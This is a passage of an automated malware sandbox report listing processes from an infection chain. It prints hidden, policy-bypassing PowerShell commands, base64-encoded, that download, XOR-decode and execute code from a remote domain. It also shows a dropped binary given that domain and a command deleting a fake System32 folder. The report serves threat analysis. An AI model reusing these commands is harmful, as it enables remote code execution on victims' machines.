                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:04:58:06
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:POwERshELL -W hIDDEn -nOlogo -nOp -Ep BypasS -ENCOdedCommaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBDAG8ARABpAE4AZwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwB0AHIASQBOAEcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAwAFEAPQAiACkAKQApACkALgBDAG8AbgB0AGUAbgB0ACkAKQA="
                                                                                                                          Imagebase:0x7ff6b7220000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:04:58:06
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:04:58:08
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wpyeyr2r\wpyeyr2r.cmdline"
                                                                                                                          Imagebase:0x7ff665080000
                                                                                                                          File size:2'759'232 bytes
                                                                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:04:58:08
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8A4C.tmp" "c:\Users\user\AppData\Local\Temp\wpyeyr2r\CSCD8967564BBC847D191922ABCF6C6B3B.TMP"
                                                                                                                          Imagebase:0x7ff737220000
                                                                                                                          File size:52'744 bytes
                                                                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:6
                                                                                                                          Start time:04:58:16
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                          Imagebase:0x7ff6b7220000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:7
                                                                                                                          Start time:04:58:16
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:04:58:19
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                                                          Imagebase:0x7ff614290000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:9
                                                                                                                          Start time:04:58:19
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:10
                                                                                                                          Start time:04:58:19
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8ANgA3AGYAMAA4ADIAOABkAGUANQA1AGEANwBiADAAYQBlADQAMQA0ADMAZABlAGYANAAxAGIAZQA1ADgAMgA2AGUAMwA1ADcAMgA4AGYAZQA1ADEANgBhADYAOABmAGQANwA3ADcANgBmADQAZgA0ADcANAA2ADgAOQBiAGMANgBhAGIAMgAyADIANwAzAGMANwAzAGIANwAwAGEAMQBkAGIANgBhADEAZAAxAGEANQBhADcAMgAyAGQAYgA1ADcAOAAyADYAYwBkAGIAYQBmADkAYgBiADEAZABhADkAMQA5AGEAYgA2AGIANQAzADkANgA3AGMANABiAGYAMAA0ADQAZgBiADgAMgBiADgAMQBhAGYAZABiAGYAMQA1ADUANgA5AGQANQBlAGMAYwBkAGUAMAAzAGIAYwA4AGMANABhADcAYQA3ADEANAA5ADgAZQBiADEAZAA2AGIAOAAwAGQAMgA2ADAAMAA3ADYANgBhAGEANwA5ADgAMQAxADkAZQA5ADcANAA0AGMAYwBiADkAYQAxADIANAA5ADcANgAxADgAZQA4AGMAMgAxADkAOAA3ADIANgAyADAAMwA2ACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAYgB5AHQAZQBBAHIAcgBhAHkAWwAkAGkAXQAgAD0AIAAkAGIAeQB0AGUAQQByAHIAYQB5AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADsAIAB9AA0ACgAJAAkASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAQQByAHIAYQB5ACkAKQA7AA0ACgAJAAkAYgByAGUAYQBrADsADQAKAAkAfQANAAoACQBjAGEAdABjAGgADQAKAAkAewANAAoACQAJAFMAZQBuAGQAIAAkAF8ALgBFAHgAYwBlAHAAdABpAG8AbgAuAE0AZQBzAHMAYQBnAGUAOwANAAoACQAJACQAYwBvAHUAbgB0ACAALQA9ACAAMQA7AA0ACgAJAAkAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQA1ADsADQAKAAkAfQANAAoAfQANAAoADQAKAA0ACgA=
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:452'608 bytes
                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:11
                                                                                                                          Start time:04:58:19
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:12
                                                                                                                          Start time:04:58:20
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\AppData\Local\Temp\SPENDINGONDIGITALMARKETING_DIGITALMARKETINGBUDGET.pdf"
                                                                                                                          Imagebase:0x300000
                                                                                                                          File size:3'891'152 bytes
                                                                                                                          MD5 hash:0F4FB7ADA3C27236864D008A1687AD8D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:13
                                                                                                                          Start time:04:58:22
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16777215
                                                                                                                          Imagebase:0xd90000
                                                                                                                          File size:2'841'040 bytes
                                                                                                                          MD5 hash:35AF5C1FA6FAC9569BB3FF6654A7152E
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:14
                                                                                                                          Start time:04:58:22
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.3.20269 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --mojo-platform-channel-handle=2348 --field-trial-handle=1660,i,15687082423060682323,12488084436830173186,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                                                          Imagebase:0xd90000
                                                                                                                          File size:2'841'040 bytes
                                                                                                                          MD5 hash:35AF5C1FA6FAC9569BB3FF6654A7152E
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:16
                                                                                                                          Start time:04:58:26
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                          Imagebase:0x7ff61bc80000
                                                                                                                          File size:496'640 bytes
                                                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:17
                                                                                                                          Start time:04:58:54
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\Temp\svczHost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\Temp\svczHost.exe cakoi10 uyt1n8ded9fb380.com
                                                                                                                          Imagebase:0x7ff78acd0000
                                                                                                                          File size:8'351'232 bytes
                                                                                                                          MD5 hash:EB57894A8FF610DF55C97E427D0DDD7B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 16%, ReversingLabs
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:18
                                                                                                                          Start time:04:58:54
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff7d0fb0000
                                                                                                                          File size:875'008 bytes
                                                                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:19
                                                                                                                          Start time:04:58:54
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
                                                                                                                          Imagebase:0x7ff614290000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:20
                                                                                                                          Start time:04:58:55
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"cmd.exe" /c sc query myRdpService
                                                                                                                          Imagebase:0x7ff614290000
                                                                                                                          File size:289'792 bytes
                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:21
                                                                                                                          Start time:04:58:55
                                                                                                                          Start date:08/11/2024
                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):false
